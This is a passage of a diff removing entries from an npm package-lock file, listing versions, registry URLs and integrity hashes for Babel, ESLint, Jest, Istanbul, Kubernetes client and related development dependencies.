"7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.14.5" - } - }, - "@babel/plugin-syntax-typescript": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.25.9.tgz", - "integrity": "sha512-hjMgRy5hb8uJJjUcdWunWVcoi9bGpJp8p5Ol1229PoN6aytsLwNMgmdftO23wnCLMfVmTwZDWMPNq/D1SY60JQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.25.9" - } - }, - "@babel/template": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.25.9.tgz", - "integrity": "sha512-9DGttpmPvIxBb/2uwpVo3dqJ+O6RooAFOS+lB+xDqoE2PVCE8nfoHMdZLpfCQRLwvohzXISPZcgxt80xLfsuwg==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.25.9", - "@babel/parser": "^7.25.9", - "@babel/types": "^7.25.9" - } - }, - "@babel/traverse": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.25.9.tgz", - "integrity": "sha512-ZCuvfwOwlz/bawvAuvcj8rrithP2/N55Tzz342AkTvq4qaWbGfmCk/tKhNaV2cthijKrPAA8SRJV5WWe7IBMJw==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.25.9", - "@babel/generator": "^7.25.9", - "@babel/parser": "^7.25.9", - "@babel/template": "^7.25.9", - "@babel/types": "^7.25.9", - "debug": "^4.3.1", - "globals": "^11.1.0" - }, - "dependencies": { - "globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true - } - } - }, - "@babel/types": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.26.0.tgz", - "integrity": "sha512-Z/yiTPj+lDVnF7lWeKCIJzaIkI0vYO87dMpZ4bg4TDrFe4XXLFWL1TbXU27gBP3QccxV9mZICCrnjnYlJjXHOA==", - "dev": true, - "requires": { - "@babel/helper-string-parser": "^7.25.9", - "@babel/helper-validator-identifier": "^7.25.9" - } - }, - "@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "@eslint-community/eslint-utils": { - "version": "4.4.0", - "resolved": "https://registry.npmjs.org/@eslint-community/eslint-utils/-/eslint-utils-4.4.0.tgz", - "integrity": "sha512-1/sA4dwrzBAyeUoQ6oxahHKmrZvsnLCg4RfxW3ZFGGmQkSNQPFNLV9CUEFQP1x9EYXHTo5p6xdhZM1Ne9p/AfA==", - "dev": true, - "peer": true, - "requires": { - "eslint-visitor-keys": "^3.3.0" - } - }, - "@eslint-community/regexpp": { - "version": "4.5.1", - "resolved": "https://registry.npmjs.org/@eslint-community/regexpp/-/regexpp-4.5.1.tgz", - "integrity": "sha512-Z5ba73P98O1KUYCCJTUeVpja9RcGoMdncZ6T49FCUl2lN38JtCJ+3WgIDBv0AuY4WChU5PmtJmOCTlN6FZTFKQ==", - "dev": true, - "peer": true - }, - "@eslint/eslintrc": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/@eslint/eslintrc/-/eslintrc-2.1.0.tgz", - "integrity": "sha512-Lj7DECXqIVCqnqjjHMPna4vn6GJcMgul/wuS0je9OZ9gsL0zzDpKPVtcG1HaDVc+9y+qgXneTeUMbCqXJNpH1A==", - "dev": true, - "peer": true, - "requires": { - "ajv": "^6.12.4", - "debug": "^4.3.2", - "espree": "^9.6.0", - "globals": "^13.19.0", - "ignore": "^5.2.0", - "import-fresh": "^3.2.1", - "js-yaml": "^4.1.0", - "minimatch": "^3.1.2", - "strip-json-comments": "^3.1.1" - } - }, - "@eslint/js": { - "version": "8.44.0", - "resolved": "https://registry.npmjs.org/@eslint/js/-/js-8.44.0.tgz", - "integrity": "sha512-Ag+9YM4ocKQx9AarydN0KY2j0ErMHNIocPDrVo8zAE44xLTjEtz81OdR68/cydGtk6m6jDb5Za3r2useMzYmSw==", - "dev": true, - "peer": true - }, - "@humanwhocodes/config-array": { - "version": "0.11.10", - "resolved": "https://registry.npmjs.org/@humanwhocodes/config-array/-/config-array-0.11.10.tgz", - "integrity": "sha512-KVVjQmNUepDVGXNuoRRdmmEjruj0KfiGSbS8LVc12LMsWDQzRXJ0qdhN8L8uUigKpfEHRhlaQFY0ib1tnUbNeQ==", - "dev": true, - "peer": true, - "requires": { - "@humanwhocodes/object-schema": "^1.2.1", - "debug": "^4.1.1", - "minimatch": "^3.0.5" - } - }, - "@humanwhocodes/module-importer": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/@humanwhocodes/module-importer/-/module-importer-1.0.1.tgz", - "integrity": "sha512-bxveV4V8v5Yb4ncFTT3rPSgZBOpCkjfK0y4oVVVJwIuDVBRMDXrPyXRL988i5ap9m9bnyEEjWfm5WkBmtffLfA==", - "dev": true, - "peer": true - }, - "@humanwhocodes/object-schema": { - "version": "1.2.1", - "resolved": "https://registry.npmjs.org/@humanwhocodes/object-schema/-/object-schema-1.2.1.tgz", - "integrity": "sha512-ZnQMnLV4e7hDlUvw8H+U8ASL02SS2Gn6+9Ac3wGGLIe7+je2AeAOxPY+izIPJDfFDb7eDjev0Us8MO1iFRN8hA==", - "dev": true, - "peer": true - }, - "@isaacs/cliui": { - "version": "8.0.2", - "resolved": "https://registry.npmjs.org/@isaacs/cliui/-/cliui-8.0.2.tgz", - "integrity": "sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA==", - "requires": { - "string-width": "^5.1.2", - "string-width-cjs": "npm:string-width@^4.2.0", - "strip-ansi": "^7.0.1", - "strip-ansi-cjs": "npm:strip-ansi@^6.0.1", - "wrap-ansi": "^8.1.0", - "wrap-ansi-cjs": "npm:wrap-ansi@^7.0.0" - }, - "dependencies": { - "ansi-regex": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-6.1.0.tgz", - "integrity": "sha512-7HSX4QQb4CspciLpVFwyRe79O3xsIZDDLER21kERQ71oaPodF8jL725AgJMFAYbooIqolJoRLuM81SpeUkpkvA==" - }, - "ansi-styles": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.1.tgz", - "integrity": "sha512-bN798gFfQX+viw3R7yrGWRqnrN2oRkEkUjjl4JNn4E8GxxbjtG3FbrEIIY3l8/hrwUwIeCZvi4QuOTP4MErVug==" - }, - "emoji-regex": { - "version": "9.2.2", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz", - "integrity": "sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==" - }, - "string-width": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-5.1.2.tgz", - "integrity": "sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA==", - "requires": { - "eastasianwidth": "^0.2.0", - "emoji-regex": "^9.2.2", - "strip-ansi": "^7.0.1" - } - }, - "strip-ansi": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-7.1.0.tgz", - "integrity": "sha512-iq6eVVI64nQQTRYq2KtEg2d2uU7LElhTJwsH4YzIHZshxlgZms/wIc4VoDQTlG/IvVIrBKG06CrZnp0qv7hkcQ==", - "requires": { - "ansi-regex": "^6.0.1" - } - }, - "wrap-ansi": { - "version": "8.1.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-8.1.0.tgz", - "integrity": "sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ==", - "requires": { - "ansi-styles": "^6.1.0", - "string-width": "^5.0.1", - "strip-ansi": "^7.0.1" - } - } - } - }, - "@isaacs/fs-minipass": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/@isaacs/fs-minipass/-/fs-minipass-4.0.1.tgz", - "integrity": "sha512-wgm9Ehl2jpeqP3zw/7mo3kRHFp5MEDhqAdwy1fTGkHAwnkGOVsgpvQhL8B5n1qlb01jV3n/bI0ZfZp5lWA1k4w==", - "requires": { - "minipass": "^7.0.4" - } - }, - "@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "requires": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - }, - "dependencies": { - "argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "requires": { - "sprintf-js": "~1.0.2" - } - }, - "find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "requires": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - } - }, - "js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "requires": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - } - }, - "locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "requires": { - "p-locate": "^4.1.0" - } - }, - "p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "requires": { - "p-try": "^2.0.0" - } - }, - "p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "requires": { - "p-limit": "^2.2.0" - } - }, - "resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true - } - } - }, - "@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true - }, - "@jest/console": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.7.0.tgz", - "integrity": "sha512-5Ni4CU7XHQi32IJ398EEP4RrB8eV09sXP2ROqD4bksHrnTree52PsxvX8tpL8LvTZ3pFzXyPbNQReSN41CAhOg==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0" - } - }, - "@jest/core": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.7.0.tgz", - "integrity": "sha512-n7aeXWKMnGtDA48y8TLWJPJmLmmZ642Ceo78cYWEpiD7FzDgmNDV/GCVRorPABdXLJZ/9wzzgZAlHjXjxDHGsg==", - "dev": true, - "requires": { - "@jest/console": "^29.7.0", - "@jest/reporters": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.7.0", - "jest-config": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-resolve-dependencies": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "jest-watcher": "^29.7.0", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - } - }, - "@jest/environment": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.7.0.tgz", - "integrity": "sha512-aQIfHDq33ExsN4jP1NWGXhxgQ/wixs60gDiKO+XVMd8Mn0NWPWgc34ZQDTb2jKaUWQ7MuwoitXAsN2XVXNMpAw==", - "dev": true, - "requires": { - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0" - } - }, - "@jest/expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-8uMeAMycttpva3P1lBHB8VciS9V0XAr3GymPpipdyQXbBcuhkLQOSe8E/p92RyAdToS6ZD1tFkX+CkhoECE0dQ==", - "dev": true, - "requires": { - "expect": "^29.7.0", - "jest-snapshot": "^29.7.0" - } - }, - "@jest/expect-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.7.0.tgz", - "integrity": "sha512-GlsNBWiFQFCVi9QVSx7f5AgMeLxe9YCCs5PuP2O2LdjDAA8Jh9eX7lA1Jq/xdXw3Wb3hyvlFNfZIfcRetSzYcA==", - "dev": true, - "requires": { - "jest-get-type": "^29.6.3" - } - }, - "@jest/fake-timers": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.7.0.tgz", - "integrity": "sha512-q4DH1Ha4TTFPdxLsqDXK1d3+ioSL7yL5oCMJZgDYm6i+6CygW5E5xVr/D1HdsGxjt1ZWSfUAs9OxSB/BNelWrQ==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - } - }, - "@jest/globals": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.7.0.tgz", - "integrity": "sha512-mpiz3dutLbkW2MNFubUGUEVLkTGiqW6yLVTA+JbP6fI6J5iL9Y0Nlg8k95pcF8ctKwCS7WVxteBs29hhfAotzQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/types": "^29.6.3", - "jest-mock": "^29.7.0" - } - }, - "@jest/reporters": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.7.0.tgz", - "integrity": "sha512-DApq0KJbJOEzAFYjHADNNxAE3KbhxQB1y5Kplb5Waqw6zVbuWatSnMjE5gs8FUgEPmNsnZA3NCWl9NG0ia04Pg==", - "dev": true, - "requires": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^6.0.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - } - }, - "@jest/schemas": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.3.tgz", - "integrity": "sha512-mo5j5X+jIZmJQveBKeS/clAueipV7KgiX1vMgCxam1RNYiqE1w62n0/tJJnHtjW8ZHcQco5gY85jA3mi0L+nSA==", - "dev": true, - "requires": { - "@sinclair/typebox": "^0.27.8" - } - }, - "@jest/source-map": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.3.tgz", - "integrity": "sha512-MHjT95QuipcPrpLM+8JMSzFx6eHp5Bm+4XeFDJlwsvVBjmKNiIAvasGK2fxz2WbGRlnvqehFbh07MMa7n3YJnw==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - } - }, - "@jest/test-result": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.7.0.tgz", - "integrity": "sha512-Fdx+tv6x1zlkJPcWXmMDAG2HBnaR9XPSd5aDWQVsfrZmLVT3lU1cwyxLgRmXR9yrq4NBoEm9BMsfgFzTQAbJYA==", - "dev": true, - "requires": { - "@jest/console": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - } - }, - "@jest/test-sequencer": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.7.0.tgz", - "integrity": "sha512-GQwJ5WZVrKnOJuiYiAF52UNUJXgTZx1NHjFSEB0qEMmSZKAkdMoIzw/Cj6x6NF4AvV23AUqDpFzQkN/eYCYTxw==", - "dev": true, - "requires": { - "@jest/test-result": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "slash": "^3.0.0" - } - }, - "@jest/transform": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.7.0.tgz", - "integrity": "sha512-ok/BTPFzFKVMwO5eOHRrvnBVHdRy9IrsrW1GpMaQ9MCnilNLXQKmAX8s1YXDFaai9xJpac2ySzV0YeRRECr2Vw==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - } - }, - "@jest/types": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.3.tgz", - "integrity": "sha512-u3UPsIilWKOM3F9CXtrG8LEJmNxwoCQC/XVj4IKYXvvpx7QIi/Kg1LI5uDmDpKlac62NUtX7eLjRh+jVZcLOzw==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - } - }, - "@jridgewell/gen-mapping": { - "version": "0.3.5", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.5.tgz", - "integrity": "sha512-IzL8ZoEDIBRWEzlCcRhOaCupYyN5gdIK+Q6fbFdPDg6HqX6jpkItn7DFIpW9LQzXG6Df9sA7+OKnq0qlz/GaQg==", - "dev": true, - "requires": { - "@jridgewell/set-array": "^1.2.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.24" - } - }, - "@jridgewell/resolve-uri": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.2.tgz", - "integrity": "sha512-bRISgCIjP20/tbWSPWMEi54QVPRZExkuD9lJL+UIxUKtwVJA8wW1Trb1jMs1RFXo1CBTNZ/5hpC9QvmKWdopKw==", - "dev": true - }, - "@jridgewell/set-array": { - "version": "1.2.1", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.2.1.tgz", - "integrity": "sha512-R8gLRTZeyp03ymzP/6Lil/28tGeGEzhx1q2k703KGWRAI1VdvPIXdG70VJc2pAMw3NA6JKL5hhFu1sJX0Mnn/A==", - "dev": true - }, - "@jridgewell/sourcemap-codec": { - "version": "1.5.0", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.5.0.tgz", - "integrity": "sha512-gv3ZRaISU3fjPAgNsriBRqGWQL6quFx04YMPW/zD8XMLsU32mhCCbfbO6KZFLjvYpCZ8zyDEgqsgf+PwPaM7GQ==", - "dev": true - }, - "@jridgewell/trace-mapping": { - "version": "0.3.25", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.25.tgz", - "integrity": "sha512-vNk6aEwybGtawWmy/PzwnGDOjCkLWSD2wqvjGGAgOAwCGWySYXfYoxt00IJkTF+8Lb57DwOb3Aa0o9CApepiYQ==", - "dev": true, - "requires": { - "@jridgewell/resolve-uri": "^3.1.0", - "@jridgewell/sourcemap-codec": "^1.4.14" - } - }, - "@jsep-plugin/assignment": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", - "integrity": "sha512-VVgV+CXrhbMI3aSusQyclHkenWSAm95WaiKrMxRFam3JSUiIaQjoMIw2sEs/OX4XifnqeQUN4DYbJjlA8EfktQ==", - "requires": {} - }, - "@jsep-plugin/regex": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/@jsep-plugin/regex/-/regex-1.0.4.tgz", - "integrity": "sha512-q7qL4Mgjs1vByCaTnDFcBnV9HS7GVPJX5vyVoCgZHNSC9rjwIlmbXG5sUuorR5ndfHAIlJ8pVStxvjXHbNvtUg==", - "requires": {} - }, - "@kubernetes/client-node": { - "version": "0.22.3", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.22.3.tgz", - "integrity": "sha512-dG8uah3+HDJLpJEESshLRZlAZ4PgDeV9mZXT0u1g7oy4KMRzdZ7n5g0JEIlL6QhK51/2ztcIqURAnjfjJt6Z+g==", - "requires": { - "byline": "^5.0.0", - "isomorphic-ws": "^5.0.0", - "js-yaml": "^4.1.0", - "jsonpath-plus": "^10.2.0", - "openid-client": "^6.1.3", - "request": "^2.88.0", - "rfc4648": "^1.3.0", - "stream-buffers": "^3.0.2", - "tar": "^7.0.0", - "tslib": "^2.4.1", - "ws": "^8.18.0" - } - }, - "@nodelib/fs.scandir": { - "version": "2.1.5", - "resolved": "https://registry.npmjs.org/@nodelib/fs.scandir/-/fs.scandir-2.1.5.tgz", - "integrity": "sha512-vq24Bq3ym5HEQm2NKCr3yXDwjc7vTsEThRDnkp2DK9p1uqLR+DHurm/NOTo0KG7HYHU7eppKZj3MyqYuMBf62g==", - "dev": true, - "peer": true, - "requires": { - "@nodelib/fs.stat": "2.0.5", - "run-parallel": "^1.1.9" - } - }, - "@nodelib/fs.stat": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/@nodelib/fs.stat/-/fs.stat-2.0.5.tgz", - "integrity": "sha512-RkhPPp2zrqDAQA/2jNhnztcPAlv64XdhIp7a7454A5ovI7Bukxgt7MX7udwAu3zg1DcpPU0rz3VV1SeaqvY4+A==", - "dev": true, - "peer": true - }, - "@nodelib/fs.walk": { - "version": "1.2.8", - "resolved": "https://registry.npmjs.org/@nodelib/fs.walk/-/fs.walk-1.2.8.tgz", - "integrity": "sha512-oGB+UxlgWcgQkgwo8GcEGwemoTFt3FIO9ababBmaGwXIoBKZ+GTy0pP185beGg7Llih/NSHSV2XAs1lnznocSg==", - "dev": true, - "peer": true, - "requires": { - "@nodelib/fs.scandir": "2.1.5", - "fastq": "^1.6.0" - } - }, - "@pkgjs/parseargs": { - "version": "0.11.0", - "resolved": "https://registry.npmjs.org/@pkgjs/parseargs/-/parseargs-0.11.0.tgz", - "integrity": "sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==", - "optional": true - }, - "@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "@sinonjs/commons": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.1.tgz", - "integrity": "sha512-K3mCHKQ9sVh8o1C9cxkwxaOmXoAMlDxC1mYyHrjqOWEcBjYr76t96zL2zlj5dUGZ3HSw240X1qgH3Mjf1yJWpQ==", - "dev": true, - "requires": { - "type-detect": "4.0.8" - } - }, - "@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "requires": { - "@sinonjs/commons": "^3.0.0" - } - }, - "@types/babel__core": { - "version": "7.20.5", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.5.tgz", - "integrity": "sha512-qoQprZvz5wQFJwMDqeseRXWv3rqMvhgpbXFfVyWhbx9X47POIA6i/+dXefEmZKoAgOaTdaIgNSMqMIU61yRyzA==", - "dev": true, - "requires": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "@types/babel__generator": { - "version": "7.6.8", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.8.tgz", - "integrity": "sha512-ASsj+tpEDsEiFr1arWrlN6V3mdfjRMZt6LtK/Vp/kreFLnr5QH5+DhvD5nINYZXzwJvXeGq+05iUXcAzVrqWtw==", - "dev": true, - "requires": { - "@babel/types": "^7.0.0" - } - }, - "@types/babel__template": { - "version": "7.4.4", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.4.tgz", - "integrity": "sha512-h/NUaSyG5EyxBIp8YRxo4RMe2/qQgvyowRwVMzhYhBCONbW8PUsg4lkFMrhgZhUe5z3L3MiLDuvyJ/CaPa2A8A==", - "dev": true, - "requires": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "@types/babel__traverse": { - "version": "7.20.6", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.6.tgz", - "integrity": "sha512-r1bzfrm0tomOI8g1SzvCaQHo6Lcv6zu0EA+W2kHrt8dyrHQxGzBBL4kdkzIS+jBMV+EYcMAEAqXqYaLJq5rOZg==", - "dev": true, - "requires": { - "@babel/types": "^7.20.7" - } - }, - "@types/graceful-fs": { - "version": "4.1.9", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.9.tgz", - "integrity": "sha512-olP3sd1qOEe5dXTSaFvQG+02VdRXcdytWLAZsAq1PecU8uqQAhkrnbli7DagjtXKW/Bl7YJbUsa8MPcuc8LHEQ==", - 